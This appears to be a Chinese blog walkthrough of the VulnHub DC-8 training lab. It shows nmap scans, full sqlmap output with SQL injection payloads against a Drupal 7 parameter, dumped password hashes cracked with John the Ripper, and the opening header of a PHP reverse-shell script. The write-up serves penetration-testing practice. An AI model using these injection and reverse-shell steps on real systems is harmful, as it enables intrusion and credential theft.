Lluna's Pure land.

What is life like when singing to wine?

0%

DC-8

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 39k 阅读时长 ≈ 36 分钟

0x00.官网描述

DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This challenge is a bit of a hybrid between being an actual challenge, and being a “proof of concept” as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.

The “proof of concept” portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.

You probably wouldn’t even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it’s definitely there and doing it’s job.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x01.老规矩nmap

可以发现1为网关,2为宿主机,6为kali,那么3就是我们的受害者

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@JIYE:~/vulnhub/dc8# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 20:37 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0029s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00051s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00033s latency).
MAC Address: 00:0C:29:57:6A:A6 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds
root@JIYE:~/vulnhub/dc8#

0x02.继续nmap扫描服务及端口

可以发现开放了22/80端口,且Drupal的版本为7

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@JIYE:~/vulnhub/dc8# nmap -sC -sV -v 192.168.1.3 -oN nmap.demo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 20:38 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating ARP Ping Scan at 20:38
Scanning 192.168.1.3 [1 port]
Completed ARP Ping Scan at 20:38, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:38
Completed Parallel DNS resolution of 1 host. at 20:38, 0.03s elapsed
Initiating SYN Stealth Scan at 20:38
Scanning 192.168.1.3 [1000 ports]
Discovered open port 80/tcp on 192.168.1.3
Discovered open port 22/tcp on 192.168.1.3
Completed SYN Stealth Scan at 20:38, 0.08s elapsed (1000 total ports)
Initiating Service scan at 20:38
Scanning 2 services on 192.168.1.3
Completed Service scan at 20:38, 6.71s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.3.
Initiating NSE at 20:38
Completed NSE at 20:38, 1.27s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.02s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Nmap scan report for 192.168.1.3
Host is up (0.000092s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:57:6A:A6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Initiating NSE at 20:38
Completed NSE at 20:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.75 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.036KB)
root@JIYE:~/vulnhub/dc8#

0x03.发现80端口,直接访问

手动爬虫,发现可能存在sql注入

尝试闭合,发现报错

查看robots.txt,发现更新日志与后台登入地址

0x04.爆库

发现数据库为d7db

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.8#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:57:11 /2020-08-30/

[20:57:11] [INFO] testing connection to the target URL
[20:57:11] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:57:11] [INFO] testing if the target URL content is stable
[20:57:11] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] 
[20:57:13] [INFO] testing if GET parameter 'nid' is dynamic
[20:57:14] [WARNING] GET parameter 'nid' does not appear to be dynamic
[20:57:14] [INFO] heuristic (basic) test shows that GET parameter 'nid' might be injectable (possible DBMS: 'MySQL')
[20:57:14] [INFO] testing for SQL injection on GET parameter 'nid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:57:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:57:30] [WARNING] reflective value(s) found and filtering out
[20:57:30] [INFO] GET parameter 'nid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Status message")
[20:57:30] [INFO] testing 'Generic inline queries'
[20:57:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:57:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:57:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:57:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:57:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[20:57:30] [WARNING] potential permission problems detected ('command denied')
[20:57:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[20:57:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:57:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:57:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:57:30] [INFO] GET parameter 'nid' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[20:57:30] [INFO] testing 'MySQL inline queries'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:57:30] [WARNING] time-based comparison requires larger statistical model, please wait........... (done)                                      
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:57:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:57:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:57:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:57:40] [INFO] GET parameter 'nid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:57:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:57:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:57:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:57:40] [INFO] target URL appears to have 1 column in query
[20:57:41] [INFO] GET parameter 'nid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'nid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=2 AND 2744=2744

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[20:57:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:57:48] [INFO] fetching database names
[20:57:48] [INFO] retrieved: 'd7db'
[20:57:48] [INFO] retrieved: 'information_schema'
available databases [2]:                                                                                                                         
[*] d7db
[*] information_schema

[20:57:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[20:57:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 20:57:48 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x05.爆表

定位到users表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" -D "d7db" --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:59:52 /2020-08-30/

[20:59:53] [INFO] resuming back-end DBMS 'mysql' 
[20:59:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=2 AND 2744=2744

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[20:59:53] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:59:53] [INFO] fetching tables for database: 'd7db'
[20:59:53] [INFO] retrieved: 'actions'
[20:59:53] [INFO] retrieved: 'authmap'
[20:59:53] [INFO] retrieved: 'batch'
[20:59:53] [INFO] retrieved: 'block'
[20:59:53] [INFO] retrieved: 'block_custom'
[20:59:53] [INFO] retrieved: 'block_node_type'
[20:59:53] [INFO] retrieved: 'block_role'
[20:59:53] [INFO] retrieved: 'blocked_ips'
[20:59:54] [INFO] retrieved: 'cache'
[20:59:54] [INFO] retrieved: 'cache_block'
[20:59:54] [INFO] retrieved: 'cache_bootstrap'
[20:59:54] [INFO] retrieved: 'cache_field'
[20:59:54] [INFO] retrieved: 'cache_filter'
[20:59:54] [INFO] retrieved: 'cache_form'
[20:59:54] [INFO] retrieved: 'cache_image'
[20:59:54] [INFO] retrieved: 'cache_menu'
[20:59:54] [INFO] retrieved: 'cache_page'
[20:59:54] [INFO] retrieved: 'cache_path'
[20:59:54] [INFO] retrieved: 'cache_views'
[20:59:54] [INFO] retrieved: 'cache_views_data'
[20:59:54] [INFO] retrieved: 'ckeditor_input_format'
[20:59:54] [INFO] retrieved: 'ckeditor_settings'
[20:59:54] [INFO] retrieved: 'ctools_css_cache'
[20:59:54] [INFO] retrieved: 'ctools_object_cache'
[20:59:54] [INFO] retrieved: 'date_format_locale'
[20:59:54] [INFO] retrieved: 'date_format_type'
[20:59:54] [INFO] retrieved: 'date_formats'
[20:59:54] [INFO] retrieved: 'field_config'
[20:59:54] [INFO] retrieved: 'field_config_instance'
[20:59:54] [INFO] retrieved: 'field_data_body'
[20:59:54] [INFO] retrieved: 'field_data_field_image'
[20:59:54] [INFO] retrieved: 'field_data_field_tags'
[20:59:54] [INFO] retrieved: 'field_revision_body'
[20:59:54] [INFO] retrieved: 'field_revision_field_image'
[20:59:54] [INFO] retrieved: 'field_revision_field_tags'
[20:59:54] [INFO] retrieved: 'file_managed'
[20:59:54] [INFO] retrieved: 'file_usage'
[20:59:54] [INFO] retrieved: 'filter'
[20:59:54] [INFO] retrieved: 'filter_format'
[20:59:54] [INFO] retrieved: 'flood'
[20:59:54] [INFO] retrieved: 'history'
[20:59:54] [INFO] retrieved: 'image_effects'
[20:59:54] [INFO] retrieved: 'image_styles'
[20:59:54] [INFO] retrieved: 'menu_custom'
[20:59:54] [INFO] retrieved: 'menu_links'
[20:59:54] [INFO] retrieved: 'menu_router'
[20:59:54] [INFO] retrieved: 'node'
[20:59:54] [INFO] retrieved: 'node_access'
[20:59:54] [INFO] retrieved: 'node_revision'
[20:59:54] [INFO] retrieved: 'node_type'
[20:59:54] [INFO] retrieved: 'queue'
[20:59:54] [INFO] retrieved: 'rdf_mapping'
[20:59:54] [INFO] retrieved: 'registry'
[20:59:54] [INFO] retrieved: 'registry_file'
[20:59:54] [INFO] retrieved: 'role'
[20:59:54] [INFO] retrieved: 'role_permission'
[20:59:54] [INFO] retrieved: 'search_dataset'
[20:59:54] [INFO] retrieved: 'search_index'
[20:59:54] [INFO] retrieved: 'search_node_links'
[20:59:54] [INFO] retrieved: 'search_total'
[20:59:55] [INFO] retrieved: 'semaphore'
[20:59:55] [INFO] retrieved: 'sequences'
[20:59:55] [INFO] retrieved: 'sessions'
[20:59:55] [INFO] retrieved: 'shortcut_set'
[20:59:55] [INFO] retrieved: 'shortcut_set_users'
[20:59:55] [INFO] retrieved: 'site_messages_table'
[20:59:55] [INFO] retrieved: 'system'
[20:59:55] [INFO] retrieved: 'taxonomy_index'
[20:59:55] [INFO] retrieved: 'taxonomy_term_data'
[20:59:55] [INFO] retrieved: 'taxonomy_term_hierarchy'
[20:59:55] [INFO] retrieved: 'taxonomy_vocabulary'
[20:59:55] [INFO] retrieved: 'url_alias'
[20:59:55] [INFO] retrieved: 'users'
[20:59:55] [INFO] retrieved: 'users_roles'
[20:59:55] [INFO] retrieved: 'variable'
[20:59:55] [INFO] retrieved: 'views_display'
[20:59:55] [INFO] retrieved: 'views_view'
[20:59:55] [INFO] retrieved: 'watchdog'
[20:59:55] [INFO] retrieved: 'webform'
[20:59:55] [INFO] retrieved: 'webform_component'
[20:59:55] [INFO] retrieved: 'webform_conditional'
[20:59:55] [INFO] retrieved: 'webform_conditional_actions'
[20:59:55] [INFO] retrieved: 'webform_conditional_rules'
[20:59:55] [INFO] retrieved: 'webform_emails'
[20:59:55] [INFO] retrieved: 'webform_last_download'
[20:59:55] [INFO] retrieved: 'webform_roles'
[20:59:55] [INFO] retrieved: 'webform_submissions'
[20:59:55] [INFO] retrieved: 'webform_submitted_data'
Database: d7db                                                                                                                                   
[88 tables]
+-----------------------------+
| filter                      |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+

[20:59:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 20:59:55 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x06.爆字段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" -D "d7db" -T "users" --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.8#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:04:47 /2020-08-30/

[21:04:47] [INFO] resuming back-end DBMS 'mysql' 
[21:04:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=2 AND 2744=2744

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[21:04:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[21:04:47] [INFO] fetching columns for table 'users' in database 'd7db'
[21:04:47] [INFO] retrieved: 'uid','int(10) unsigned'
[21:04:47] [INFO] retrieved: 'name','varchar(60)'
[21:04:47] [INFO] retrieved: 'pass','varchar(128)'
[21:04:47] [INFO] retrieved: 'mail','varchar(254)'
[21:04:47] [INFO] retrieved: 'theme','varchar(255)'
[21:04:48] [INFO] retrieved: 'signature','varchar(255)'
[21:04:48] [INFO] retrieved: 'signature_format','varchar(255)'
[21:04:48] [INFO] retrieved: 'created','int(11)'
[21:04:48] [INFO] retrieved: 'access','int(11)'
[21:04:48] [INFO] retrieved: 'login','int(11)'
[21:04:48] [INFO] retrieved: 'status','tinyint(4)'
[21:04:48] [INFO] retrieved: 'timezone','varchar(32)'
[21:04:48] [INFO] retrieved: 'language','varchar(12)'
[21:04:48] [INFO] retrieved: 'picture','int(11)'
[21:04:48] [INFO] retrieved: 'init','varchar(254)'
[21:04:48] [INFO] retrieved: 'data','longblob'
Database: d7db                                                                                                                                   
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| language         | varchar(12)      |
| access           | int(11)          |
| created          | int(11)          |
| data             | longblob         |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| name             | varchar(60)      |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| status           | tinyint(4)       |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+

[21:04:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 21:04:48 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x06.爆数据,但是是hash的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
root@JIYE:~/vulnhub/dc8# sqlmap -u "http://192.168.1.3/?nid=2" -D "d7db" -T "users" -C "name,pass" --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:06:17 /2020-08-30/

[21:06:17] [INFO] resuming back-end DBMS 'mysql' 
[21:06:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=2 AND 2744=2744

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nid=2 AND (SELECT 3788 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3788=3788,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=2 AND (SELECT 8090 FROM (SELECT(SLEEP(5)))vgpi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: nid=-6424 UNION ALL SELECT CONCAT(0x7162766b71,0x756e745669426f51657542734855636c72567a796d6a4f4f4642425451696b77557152776b6f616c,0x716a6a7671)-- -
---
[21:06:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[21:06:17] [INFO] fetching entries of column(s) 'name, pass' for table 'users' in database 'd7db'
[21:06:17] [INFO] retrieved: '',''
[21:06:18] [INFO] retrieved: 'admin','$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'
[21:06:18] [INFO] retrieved: 'john','$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
Database: d7db                                                                                                                                   
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+

[21:06:18] [INFO] table 'd7db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.3/dump/d7db/users.csv'
[21:06:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.3'

[*] ending @ 21:06:18 /2020-08-30/

root@JIYE:~/vulnhub/dc8#

0x07.john解迷

先生成字典

1
2
3
4
root@JIYE:~/vulnhub/dc8# cat user.dic 
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
root@JIYE:~/vulnhub/dc8#

解密,john的密码为turtle

1
2
3
4
5
6
7
8
root@JIYE:~/vulnhub/dc8# john user.txt /usr/share/wordlists/rockyou.txt
···
此处省略n行
···
root@JIYE:~/vulnhub/dc8# john user.txt /usr/share/wordlists/rockyou.txt --show
john:turtle
Session aborted
root@JIYE:~/vulnhub/dc8#

0x08.登入

找了一圈发现可以写PHP代码

0x09.反弹shell

本次使用/usr/share/webshells/php/php-reverse-shell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
